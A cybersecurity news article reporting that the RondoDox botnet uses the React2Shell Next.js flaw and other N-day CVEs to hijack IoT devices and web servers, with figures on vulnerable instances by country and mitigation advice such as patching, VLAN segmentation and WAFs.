RondoDox Botnet Exploits Critical React2Shell Flaw to Hijack IoT Devices and Web Servers

Top 5 this week

CISA Retires 10 Emergency Cybersecurity Directives Issued Between 2019 and 2024

Cisco Patches ISE Security Vulnerability After Public PoC Exploit Release

Coolify Discloses 11 Critical Flaws Enabling Full Server Compromise on Self-Hosted Instances

China-Linked UAT-7290 Targets Telecoms with Linux Malware and ORB Nodes

ThreatsDay Bulletin: RustFS Flaw, Iranian Ops, WebUI RCE, Cloud Leaks, and 12 More Stories

Internet of Things (IoT) devices and web applications have been the target of a persistent nine-month campaign to enroll them in the RondoDox botnet. The activity has been seen using the rece

Internet of Things (IoT) devices and web applications have been the target of a persistent nine-month campaign to enroll them in the RondoDox botnet. The activity has been seen using the recently revealed React2Shell vulnerability as an initial access vector as of December

2025.

As of December 31, 2025, approximately 90,300 instances were still vulnerable, with 68,400 of those occurring in the United States, followed by Germany (4,300), France (2,800), and India (1,500). According to an analysis by CloudSEK, companies should update Next.js to a patched version as soon as possible, divide all IoT devices into dedicated VLANs, install Web Application Firewalls (WAFs), keep an eye out for suspicious process execution, and block known C2 infrastructure in order to reduce the risk posed by this threat. According to the researchers, the campaign has expanded its scope by acquiring new N-day security flaws, such as CVE-2023-1389 and CVE-2025-24893.

It's important to note that Darktrace, Kaspersky, and VulnCheck previously brought attention to the misuse of React2 Shell to propagate the botnet. It has been discovered that one version of the tool can set up persistence using ".etc/crontab" and eliminate known botnets, Docker-based payloads, artifacts from previous campaigns, and related cron jobs.

ZEROWL

Top 5 this week

CISA Retires 10 Emergency Cybersecurity Directives Issued Between 2019 and 2024

Cisco Patches ISE Security Vulnerability After Public PoC Exploit Release

Coolify Discloses 11 Critical Flaws Enabling Full Server Compromise on Self-Hosted Instances

China-Linked UAT-7290 Targets Telecoms with Linux Malware and ORB Nodes

ThreatsDay Bulletin: RustFS Flaw, Iranian Ops, WebUI RCE, Cloud Leaks, and 12 More Stories

Related Posts

New n8n Vulnerability (9.9 CVSS) Lets Authenticated Users Execute System Commands

Cybercriminals Abuse Google Cloud Email Feature in Multi-Stage Phishing Campaign

The ROI Problem in Attack Surface Management

How To Browse Faster and Get More Done Using Adapt Browser

ThreatsDay Bulletin: GhostAd Drain, macOS Attacks, Proxy Botnets, Cloud Exploits, and 12+ Stories

RondoDox Botnet Exploits Critical React2Shell Flaw to Hijack IoT Devices and Web Servers